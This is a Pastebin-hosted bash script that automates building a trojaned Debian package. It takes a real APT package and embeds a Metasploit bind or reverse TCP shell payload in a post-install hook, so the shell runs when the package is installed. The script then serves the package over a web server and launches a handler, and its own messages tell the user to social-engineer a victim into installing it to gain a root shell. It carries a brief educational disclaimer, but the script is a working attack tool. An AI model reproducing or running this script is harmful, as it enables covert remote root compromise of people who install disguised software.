Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # bash script to generate a Debian (.deb) package trojan using Metasploit payload
- # Author: Aaron Hine - @redmeat_uk
- # Date: 31-01-2010
- # Disclaimer: this script should be used for educational purposes. You should obtain permission before running this against an indvidual or company.
- # The author is not liable for any illegal use of this script.
- scriptname=`basename "$0"`
- if [[ $UID -ne 0 ]]; then
- echo "${scriptname} must be run as root"
- exit 1
- fi
- #
- echo
- echo "#####################################################################"
- echo "Script to generate a Debian package trojan using a Metasploit payload"
- echo "#####################################################################"
- echo
- # change these vars to suit your needs
- msfdir="/opt/metasploit3/msf3"
- tmpdir="/tmp/evildeb"
- workdir="$tmpdir/work"
- # prompt for package name and setup dirs
- echo "Please enter the name of the APT package you wish to trojan:"
- echo "Use apt-cache search <package> for ideas :)"
- echo
- read package
- apt-get --download-only install $package
- echo
- mkdir $tmpdir
- mkdir $workdir
- mv /var/cache/apt/archives/$package* $tmpdir
- mkdir $workdir/DEBIAN
- dpkg -x $tmpdir/$package* $workdir
- apt-cache show $package > $workdir/DEBIAN/control
- cat $workdir/DEBIAN/control | sed '/^Original-Maintainer/d' | sed '/^SHA/d' > $workdir/DEBIAN/control2
- mv $workdir/DEBIAN/control2 $workdir/DEBIAN/control
- echo
- echo "Please choose your Metasploit payload"
- echo "-------------------------------------"
- echo
- echo "1. bind tcp"
- echo "2. reverse tcp"
- echo
- echo "press number and hit return:"
- read choice
- if [ "$choice" -eq 1 ]; then
- payload="linux/x86/shell/bind_tcp"
- echo "Enter IP:"
- read rhostIP
- echo "Enter port:"
- read bindport
- options="RHOST=$rhostIP LPORT=$bindport"
- else
- if [ "$choice" -eq 2 ]; then
- payload="linux/x86/shell/reverse_tcp"
- echo "Enter IP:"
- read lhostIP
- echo "Enter port:"
- read revport
- options="LHOST=$lhostIP LPORT=$revport"
- fi
- fi
- echo
- echo "Please enter the filename for the Metasploit payload:"
- read filename
- echo
- cd $workdir
- binary=`find . -executable -type f | grep $package | sed -e 's/^.//'`
- trojan="$filename"
- echo "Making post-install script..."
- echo
- echo "#!/bin/sh" > $workdir/DEBIAN/postinst
- echo "" >> $workdir/DEBIAN/postinst
- echo "" >> $workdir/DEBIAN/postinst
- echo "sudo chmod 2755 $binary$trojan && $binary$trojan & $binary &" >> $workdir/DEBIAN/postinst
- trojan2=`echo $binary$trojan | sed -e 's/^\///'`
- echo "Thanks - generating your payload..."
- $msfdir/msfpayload $payload $options X > $workdir/$trojan2
- echo
- cd $workdir/DEBIAN
- chmod 755 postinst
- dpkg-deb --build $workdir
- cd $tmpdir
- echo
- echo "Please enter your webroot directory:"
- read webroot
- mv $tmpdir/work.deb $webroot/$package.deb
- rm -rf $tmpdir
- echo
- echo "Trojan'd $package.deb created and placed in $webroot"
- echo
- webserver="python -m SimpleHTTPServer 80"
- echo "Would you like a Python webserver ? (y/n) :"
- read svr
- echo
- if [[ "$svr" == "y" || "$svr" == "Y" ]]; then
- cd $webroot
- $webserver &
- echo
- else
- echo "Fair nuff, setup your own webserver :)"
- echo
- fi
- sleep 1
- echo "Would you like me to setup a metasploit handler ? (y/n) :"
- echo
- read handler
- echo
- echo "In the meantime, social engineer your victim in to browsing to your package"
- echo "and get them to install it and wait for your root shell >)"
- echo
- if [[ "$handler" == "y" || "$handler" == "Y" ]]; then
- echo
- $msfdir/msfcli exploit/multi/handler payload=$payload $options E
- else
- echo "Fair nuff, setup your own handler :)"
- echo
- fi
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
